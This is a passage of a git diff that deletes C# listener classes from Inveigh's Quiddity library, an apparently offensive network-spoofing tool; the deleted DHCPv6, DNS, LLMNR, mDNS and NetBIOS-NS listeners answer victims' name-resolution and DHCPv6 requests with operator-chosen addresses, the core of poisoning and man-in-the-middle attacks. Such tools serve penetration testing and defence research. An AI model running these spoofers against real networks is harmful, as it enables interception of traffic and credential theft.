this.DNSSuffix = ""; - this.Lifetime = 300; - this.Prefix = (new Random()).Next(1, 9999); - } - - public DHCPv6Listener(uint lifetime, string dnsSuffix) - { - this.Index = 1; - this.DNSSuffix = dnsSuffix; - this.Lifetime = lifetime; - this.Prefix = (new Random()).Next(1, 9999); - } - - public void Start(IPAddress ipAddress, string mac, string dnsIPv6) - { - UDPListener listener = new UDPListener(AddressFamily.InterNetworkV6); - IPEndPoint ipEndPoint = new IPEndPoint(ipAddress, 547); - listener.JoinMulticastGroup(IPAddress.Parse("ff02::1:2")); - listener.Client.Bind(ipEndPoint); - - while (true) - { - - try - { - byte[] receiveBuffer = listener.Receive(ref ipEndPoint); - ProcessRequest(receiveBuffer, listener, ipEndPoint, mac, dnsIPv6); - } - catch (Exception ex) - { - Console.WriteLine(ex); - } - - } - - } - - protected virtual void ProcessRequest(byte[] data, UDPListener udpListener, IPEndPoint ipEndPoint, string listenerMAC, string dnsIPv6) - { - string clientIP = ipEndPoint.Address.ToString(); - DHCPv6Packet packet = new DHCPv6Packet(data); - - if (packet.Message?.MsgType == 1 || packet.Message?.MsgType == 3 || packet.Message?.MsgType == 5) - { - bool isMicrosoft = false; - - if (packet.Option16?.EnterpriseNumber == 311) - { - isMicrosoft = true; - } - - byte msgType = 0; - string leaseIP = ""; - - switch (packet.Message.MsgType) - { - case 1: - msgType = 2; - - break; - - case 3: - { - byte[] renewIP = new DHCPv6Option5(packet.Option3.IANAOptions).IPv6Address; - leaseIP = new IPAddress(renewIP).ToString(); - msgType = 7; - } - break; - - case 5: - { - byte[] renewIP = new DHCPv6Option5(packet.Option3.IANAOptions).IPv6Address; - leaseIP = new IPAddress(renewIP).ToString(); - msgType = 7; - } - break; - } - - byte[] clientMACData = new DHCPv6DUIDLLT(packet.Option1.DUID).LinkLayerAddress; - string clientMAC = BitConverter.ToString(clientMACData).Replace("-", ":"); - string clientHostName = ""; - - if (!String.IsNullOrEmpty(packet.Option39?.DomainName)) - { - clientHostName = packet.Option39.DomainName; - } - - if (Check(clientMAC, clientHostName, listenerMAC, isMicrosoft, out string message)) - { - - if (msgType == 2) - { - leaseIP = "fe80::" + this.Prefix + ":" + this.Index; - this.Index++; - } - - byte[] buffer = new DHCPv6Packet().GetBytes(msgType, leaseIP, listenerMAC, dnsIPv6, this.DNSSuffix, this.Lifetime, packet); - SendTo(buffer, udpListener, ipEndPoint); - } - - Output(packet.Message.MsgType, leaseIP, clientIP, clientMAC, clientHostName, message); - } - - } - - public virtual bool Check(string clientMAC, string clientHostName, string listenerMAC, bool isMicrosoft, out string message) - { - message = "response sent"; - return true; - } - - protected virtual void SendTo(byte[] data, UDPListener udpListener, IPEndPoint ipEndPoint) - { - udpListener.Client.SendTo(data, ipEndPoint); - } - - protected virtual void Output(int msgType, string leaseIP, string clientIP, string clientMAC, string clientHostName, string message) - { - } - - protected virtual void OutputError(string message) - { - } - - } -} diff --git a/Inveigh/Protocols/Quiddity/Listeners/DNSListener.cs b/Inveigh/Protocols/Quiddity/Listeners/DNSListener.cs deleted file mode 100644 index dea3004..0000000 --- a/Inveigh/Protocols/Quiddity/Listeners/DNSListener.cs +++ /dev/null @@ -1,151 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using Quiddity.DNS; -using System; -using System.Net; -using System.Net.Sockets; - -namespace Quiddity -{ - public class DNSListener - { - public uint Serial { get; set; } - public uint TTL { get; set; } - public string Host { get; set; } - public ushort Priority { get; set; } - public ushort Weight { get; set; } - - public DNSListener() - { - this.TTL = 30; - } - - public DNSListener(uint ttl) - { - this.TTL = ttl; - } - - public DNSListener(uint ttl, string host) - { - this.TTL = ttl; - this.Host = host; - this.Priority = 0; - this.Weight = 100; - } - - public void Start(IPAddress ipAddress, string replyIP, string replyIPv6) - { - UDPListener listener = new UDPListener(AddressFamily.InterNetwork); - IPEndPoint ipEndPoint = new IPEndPoint(ipAddress, 53); - - if (String.Equals(ipAddress.AddressFamily.ToString(), "InterNetworkV6")) - { - listener = new UDPListener(AddressFamily.InterNetworkV6); - } - - listener.Client.Bind(ipEndPoint); - - while (true) - { - - try - { - byte[] receiveBuffer = listener.Receive(ref ipEndPoint); - ProcessRequest(receiveBuffer, listener, ipEndPoint, replyIP, replyIPv6); - } - catch (Exception ex) - { - OutputError(ex); - } - - } - - } - - protected virtual void ProcessRequest(byte[] data, UDPListener udpListener, IPEndPoint ipEndPoint, string replyIP, string replyIPv6) - { - string clientIP = ipEndPoint.Address.ToString(); - - DNSPacket packet = new DNSPacket(data) - { - Host = this.Host, - TTL = this.TTL - }; - - if (packet.Header.IsQuery()) - { - - if (Check(packet.Question.Name, packet.Question.Type, clientIP, out string message)) - { - byte[] buffer; - buffer = packet.GetBytes(this.TTL, this.Serial, replyIP, replyIPv6); - SendTo(buffer, udpListener, ipEndPoint); - } - - Output("DNS", clientIP, packet.Question.Name, packet.Question.Type, message); - } - - } - - public virtual bool Check(string name, string type, string clientIP, out string message) - { - message = "response sent"; - return true; - } - - public virtual bool Check(string name, string question, string type, string clientIP, out string message) - { - message = "response sent"; - return true; - } - - protected virtual void SendTo(byte[] data, UDPListener udpListener, IPEndPoint ipEndPoint) - { - udpListener.Client.SendTo(data, ipEndPoint); - } - - protected virtual void Output(string protocol, string clientIP, string name, string type, string message) - { - - } - - protected virtual void Output(string protocol, string clientIP, string name, string question, string type, string message) - { - - } - - protected virtual void OutputError(Exception ex) - { - - } - } -} diff --git a/Inveigh/Protocols/Quiddity/Listeners/LLMNRListener.cs b/Inveigh/Protocols/Quiddity/Listeners/LLMNRListener.cs deleted file mode 100644 index a16d513..0000000 --- a/Inveigh/Protocols/Quiddity/Listeners/LLMNRListener.cs +++ /dev/null @@ -1,101 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using Quiddity.LLMNR; -using System; -using System.Net; -using System.Net.Sockets; - -namespace Quiddity -{ - public class LLMNRListener : DNSListener - { - - public LLMNRListener() - { - this.TTL = 300; - } - - public new void Start(IPAddress ipAddress, string replyIP, string replyIPv6) - { - UDPListener listener = new UDPListener(AddressFamily.InterNetwork); - IPEndPoint ipEndPoint = new IPEndPoint(ipAddress, 5355); - - if (String.Equals(ipAddress.AddressFamily.ToString(), "InterNetwork")) - { - listener.JoinMulticastGroup(IPAddress.Parse("224.0.0.252")); - } - else - { - listener = new UDPListener(AddressFamily.InterNetworkV6); - listener.JoinMulticastGroup(IPAddress.Parse("ff02::1:3")); - } - - listener.Client.Bind(ipEndPoint); - - while (true) - { - - try - { - byte[] receiveBuffer = listener.Receive(ref ipEndPoint); - ProcessRequest(receiveBuffer, listener, ipEndPoint, replyIP, replyIPv6); - } - catch (Exception ex) - { - OutputError(ex); - } - - } - - } - - protected override void ProcessRequest(byte[] data, UDPListener udpListener, IPEndPoint ipEndPoint, string replyIP, string replyIPv6) - { - string clientIP = ipEndPoint.Address.ToString(); - LLMNRPacket packet = new LLMNRPacket(data); - - if (packet.Header.IsQuery()) - { - - if (Check(packet.Question.Name, packet.Question.Type, clientIP, out string message)) - { - byte[] buffer = packet.GetBytes(this.TTL, replyIP, replyIPv6); - SendTo(buffer, udpListener, ipEndPoint); - } - - Output("LLMNR", clientIP, packet.Question.Name, packet.Question.Type, message); - } - - } - - } -} diff --git a/Inveigh/Protocols/Quiddity/Listeners/MDNSListener.cs b/Inveigh/Protocols/Quiddity/Listeners/MDNSListener.cs deleted file mode 100644 index 973329b..0000000 --- a/Inveigh/Protocols/Quiddity/Listeners/MDNSListener.cs +++ /dev/null @@ -1,117 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using Quiddity.MDNS; -using System; -using System.Net; -using System.Net.Sockets; - -namespace Quiddity -{ - public class MDNSListener : DNSListener - { - public bool UnicastOnly { get; set; } - - public MDNSListener() - { - this.TTL = 120; - } - - public MDNSListener(uint ttl, bool unicastOnly) - { - this.TTL = ttl; - this.UnicastOnly = unicastOnly; - } - - public new void Start(IPAddress ipAddress, string replyIP, string replyIPv6) - { - UDPListener listener = new UDPListener(AddressFamily.InterNetwork); - IPEndPoint ipEndPoint = new IPEndPoint(ipAddress, 5353); - - if (string.Equals(ipAddress.AddressFamily.ToString(), "InterNetwork")) - { - listener.JoinMulticastGroup(IPAddress.Parse("224.0.0.251"), ipAddress); - } - else - { - listener = new UDPListener(AddressFamily.InterNetworkV6); - listener.JoinMulticastGroup(IPAddress.Parse("ff02::fb")); - } - - listener.Client.Bind(ipEndPoint); - - while (true) - { - - try - { - byte[] receiveBuffer = listener.Receive(ref ipEndPoint); - ProcessRequest(receiveBuffer, listener, ipEndPoint, replyIP, replyIPv6); - } - catch (Exception ex) - { - OutputError(ex); - } - - } - - } - - protected override void ProcessRequest(byte[] data, UDPListener udpListener, IPEndPoint ipEndPoint, string replyIP, string replyIPv6) - { - string clientIP = ipEndPoint.Address.ToString(); - MDNSPacket packet = new MDNSPacket(data); - - if (packet.Header.IsQuery()) - { - - if (Check(packet.Question.Name, packet.Question.QuestionType, packet.Question.Type, clientIP, out string message)) - { - - if (packet.Question.QuestionType.Equals("QM") && !this.UnicastOnly && string.Equals(ipEndPoint.Address.AddressFamily.ToString(), "InterNetwork")) - { - ipEndPoint.Address = IPAddress.Parse("224.0.0.251"); - } - else if (packet.Question.QuestionType.Equals("QM") && !this.UnicastOnly && string.Equals(ipEndPoint.Address.AddressFamily.ToString(), "InterNetworkV6")) - { - ipEndPoint.Address = IPAddress.Parse("ff02::fb"); - } - - byte[] buffer = packet.GetBytes(this.TTL, replyIP, replyIPv6); - SendTo(buffer, udpListener, ipEndPoint); - } - - Output("mDNS", clientIP, packet.Question.Name, packet.Question.QuestionType, packet.Question.Type, message); - } - - } - } -} diff --git a/Inveigh/Protocols/Quiddity/Listeners/NetBIOSNSListener.cs b/Inveigh/Protocols/Quiddity/Listeners/NetBIOSNSListener.cs deleted file mode 100644 index f2754d6..0000000 --- a/Inveigh/Protocols/Quiddity/Listeners/NetBIOSNSListener.cs +++ /dev/null @@ -1,95 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using Quiddity.NetBIOS; -using System; -using System.Net; -using System.Net.Sockets; - -namespace Quiddity -{ - public class NetBIOSNSListener : DNSListener - { - public NetBIOSNSListener() - { - this.TTL = 165; - } - - public NetBIOSNSListener(uint ttl) - { - this.TTL = ttl; - } - - public void Start(IPAddress ipAddress, string replyIP) - { - UDPListener listener = new UDPListener(AddressFamily.InterNetwork); - IPEndPoint ipEndPoint = new IPEndPoint(ipAddress, 137); - - listener.Client.Bind(ipEndPoint); - - while (true) - { - - try - { - byte[] receiveBuffer = listener.Receive(ref ipEndPoint); - ProcessRequest(receiveBuffer, listener, ipEndPoint, replyIP); - } - catch (Exception ex) - { - OutputError(ex); - } - - } - - } - - protected void ProcessRequest(byte[] data, UDPListener udpListener, IPEndPoint ipEndPoint, string replyIP) - { - string clientIP = ipEndPoint.Address.ToString(); - NetBIOSNSPacket packet = new NetBIOSNSPacket(data); - - if (packet.Header.IsQuery()) - { - - if (Check(packet.Question.Name, packet.Question.Type, clientIP, out string message)) - { - byte[] buffer = packet.GetBytes(this.TTL, replyIP); - SendTo(buffer, udpListener, ipEndPoint); - } - - Output("NBNS", clientIP, packet.Question.Name, packet.Question.Type, message); - } - - } - - } -} diff --git a/Inveigh/Protocols/Quiddity/Listeners/TCPListener.cs b/Inveigh/Protocols/Quiddity/Listeners/TCPListener.cs deleted file mode 100644 index 44af085..0000000 --- a/Inveigh/Protocols/Quiddity/Listeners/TCPListener.cs +++ /dev/null @@ -1,48 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using System.Net; -using System.Net.Sockets; - -namespace Quiddity -{ - public class TCPListener : TcpListener - { - public TCPListener(IPAddress ipAddress, int port) : base(ipAddress, port) - { - this.Server.ExclusiveAddressUse = false; - this.ExclusiveAddressUse = false; - this.Server.SetSocketOption(SocketOptionLevel.Socket, SocketOptionName.ReuseAddress, true); - } - - } - -} diff --git a/Inveigh/Protocols/Quiddity/Listeners/UDPListener.cs b/Inveigh/Protocols/Quiddity/Listeners/UDPListener.cs deleted file mode 100644 index d0a2f49..0000000 --- a/Inveigh/Protocols/Quiddity/Listeners/UDPListener.cs +++ /dev/null @@ -1,58 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using System.Net; -using System.Net.Sockets; - -namespace Quiddity -{ - public class UDPListener : UdpClient - { - - public UDPListener(AddressFamily addressFamily) : base(addressFamily) - { - this.ExclusiveAddressUse = false; - this.Client.SetSocketOption(SocketOptionLevel.Socket, SocketOptionName.ReuseAddress, true); - const int SIO_UDP_CONNRESET = -1744830452; - -#if NETFRAMEWORK - this.Client.IOControl((IOControlCode)SIO_UDP_CONNRESET, new byte[] { 0, 0, 0, 0 }, null); -#else - if (System.OperatingSystem.IsWindows()) - { - this.Client.IOControl((IOControlCode)SIO_UDP_CONNRESET, new byte[] { 0, 0, 0, 0 }, null); - } -#endif - - } - - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/DCERPC/SCMR/SCMRROpenSCManagerW.cs b/Inveigh/Protocols/Quiddity/Protocols/DCERPC/SCMR/SCMRROpenSCManagerW.cs deleted file mode 100644 index 2337915..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/DCERPC/SCMR/SCMRROpenSCManagerW.cs +++ /dev/null @@ -1,15 +0,0 @@ -using System; -using System.Collections.Generic; -using System.Linq; -using System.Text; - -namespace Quiddity.SCMR -{ - public class SCMRROpenSCManagerW - { - // https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-scmr/dc84adb3-d51d-48eb-820d-ba1c6ca5faf2 - public byte[] LpMachineName { get; set; } - public byte[] LpDatabaseName { get; set; } - public byte[] DwDesiredAccess { get; set; } - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/DHCPv6/DHCPv6Checker.cs b/Inveigh/Protocols/Quiddity/Protocols/DHCPv6/DHCPv6Checker.cs deleted file mode 100644 index 568a892..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/DHCPv6/DHCPv6Checker.cs +++ /dev/null @@ -1,150 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using Quiddity.Support; -using System; -using System.Collections.Generic; -using System.Linq; -using System.Text; - -namespace Quiddity.DHCPv6 -{ - class DHCPv6Checker - { - public string[] IgnoreMACs { get; set; } - public string[] ReplyToMACs { get; set; } - public IList HostCaptures { get; set; } - public bool Enabled { get; set; } - public bool Inspect { get; set; } - public bool Repeat { get; set; } - public bool Microsoft { get; set; } - public bool Local { get; set; } - public string OutputReplyAllowed { get; set; } - public string OutputMessage { get; set; } - public string OutputInspect { get; set; } - public string OutputDisabled { get; set; } - public string OutputLocal { get; set; } - public string OutputHostDenied { get; set; } - public string OutputMACDenied { get; set; } - public string OutputVendorDenied { get; set; } - public string OutputIPDenied { get; set; } - public string OutputRepeat { get; set; } - - public bool Check(string clientMAC, string clientHost, string listenerMAC, bool isMicrosoft) - { - - if (this.Inspect) - { - this.OutputMessage = this.OutputInspect; - return false; - } - else if (!this.Enabled) - { - this.OutputMessage = this.OutputDisabled; - return false; - } - else if (!isMicrosoft) - { - this.OutputMessage = this.OutputVendorDenied; - return false; - } - else if (IsLocal(clientMAC, listenerMAC)) - { - this.OutputMessage = this.OutputLocal; - return false; - } - else if (IsRepeat(clientHost)) - { - this.OutputMessage = this.OutputRepeat; - return false; - } - else if (MACIsDenied(clientMAC)) - { - this.OutputMessage = this.OutputMACDenied; - return false; - } - else if (!MACIsAllowed(clientMAC)) - { - this.OutputMessage = this.OutputMACDenied; - return false; - } - - this.OutputMessage = this.OutputReplyAllowed; - return true; - } - - public bool IsRepeat(string host) - { - host = host.Split('.')[0].ToUpper(); - - if (!this.Repeat && this.HostCaptures.Contains(host)) - { - return true; - } - - return false; - } - - public bool IsLocal(string clientMAC, string listenerMAC) - { - - if (!this.Local && string.Equals(clientMAC, listenerMAC)) - { - return true; - } - - return false; - } - - public bool MACIsDenied(string mac) - { - - if (!Utilities.ArrayIsNullOrEmpty(this.IgnoreMACs) && (Array.Exists(this.IgnoreMACs, element => element == mac.Replace(":", "").ToUpper()))) - { - return true; - } - - return false; - } - - public bool MACIsAllowed(string mac) - { - - if (!Utilities.ArrayIsNullOrEmpty(this.ReplyToMACs) && (!Array.Exists(this.ReplyToMACs, element => element == mac.Replace(":","").ToUpper()))) - { - return false; - } - - return true; - } - - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/DHCPv6/DHCPv6Message.cs b/Inveigh/Protocols/Quiddity/Protocols/DHCPv6/DHCPv6Message.cs deleted file mode 100644 index 3412b0d..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/DHCPv6/DHCPv6Message.cs +++ /dev/null @@ -1,86 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using System; -using System.Collections.Generic; -using System.IO; -using System.Linq; -using System.Text; - -namespace Quiddity.DHCPv6 -{ - class DHCPv6Message - { - // https://datatracker.ietf.org/doc/html/rfc3315#section-17.1.1 - public byte MsgType { get; set; } - public byte[] TransactionID { get; set; } // 3 bytes - public byte[] Options { get; set; } - - public DHCPv6Message() - { - - } - - public DHCPv6Message(byte[] data) - { - ReadBytes(data, 0); - } - - public void ReadBytes(byte[] data, int offset) - { - - using (MemoryStream memoryStream = new MemoryStream(data)) - { - PacketReader packetReader = new PacketReader(memoryStream); - memoryStream.Position = offset; - this.MsgType = 